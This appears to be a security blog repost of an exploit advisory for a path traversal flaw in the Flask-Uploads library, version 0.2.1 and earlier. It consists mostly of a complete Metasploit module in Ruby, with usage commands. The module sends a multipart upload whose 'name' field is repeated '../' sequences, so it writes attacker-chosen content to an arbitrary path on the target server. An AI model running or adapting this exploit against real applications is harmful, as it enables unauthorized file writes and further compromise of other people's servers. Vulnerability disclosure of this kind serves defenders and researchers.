Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 50
Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write
Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write
Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write

=============================================================================================================================================
| # Title Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write

=============================================================================================================================================
| # Title : Flask-Uploads <= 0.2.1 Path Traversal to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/maxcountryman/flask-uploads |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214228/

[+] Summary : This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.
The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class,
allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.
The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution.
File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.
Successful exploitation may result in unauthorized file creation on the target filesystem,
potentially enabling further attacks when chained with additional vulnerabilities.

[+] Usage :

use exploit/multi/http/flask_uploads_traversal
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set TARGETURI /upload
exploit

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = AverageRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Flask-Uploads <= 0.2.1 Path Traversal Arbitrary File Write',
'Description' => %q{
This module exploits a path traversal vulnerability in the Flask-Uploads
library (version 0.2.1 and prior). The vulnerability allows for arbitrary
file writes outside of the intended upload directory by manipulating the
'name' parameter passed to the save() function. This module focuses on
the file write primitive.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/maxcountryman/flask-uploads/issues/43']
],
'Privileged' => false,
'Platform' => %w[linux win unix],
'Arch' => ARCH_ALL,
'Targets' => [['Generic Arbitrary File Write', {}]],
'DisclosureDate' => '2024-10-25',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [], # No session guaranteed
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The vulnerable endpoint URL', '/upload']),
OptString.new('FIELD_NAME', [true, 'The multipart field name for the file upload', 'files']),
OptString.new('TRAVERSAL_DEPTH', [true, 'Depth of path traversal to reach root', '10']),
OptString.new('REMOTE_PATH', [true, 'The target path on the remote system', '/tmp/pwned.txt']),
OptString.new('FILE_CONTENT', [true, 'Content to write to the remote file', 'Vulnerability Confirmed'])
])
end

def check

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return CheckCode::Unknown('No response from the target.') unless res

if res.code == 200
return CheckCode::Detected("Endpoint #{target_uri.path} is reachable.")
end

CheckCode::Safe
end

def exploit

traversal = "../" * datastore['TRAVERSAL_DEPTH'].to_i
remote_filename = datastore['REMOTE_PATH'].sub(%r{^/}, '')
malicious_name = "#{traversal}#{remote_filename}"

data = Rex::MIME::Message.new

data.add_part(
datastore['FILE_CONTENT'],
'text/plain',
nil,
"form-data; name=\"#{datastore['FIELD_NAME']}\"; filename=\"test.txt\""
)

data.add_part(malicious_name, nil, nil, "form-data; name=\"name\"")

print_status("Attempting to write #{datastore['FILE_CONTENT'].length} bytes to #{datastore['REMOTE_PATH']}...")

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})

if res && res.code == 200
print_good("Server responded with 200 OK. Verification required at: #{datastore['REMOTE_PATH']}")
else
status = res ? res.code : 'no response'
fail_with(Failure::UnexpectedReply, "Server responded with #{status}. Exploitation failed.")
end
end
end

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
Social Media Share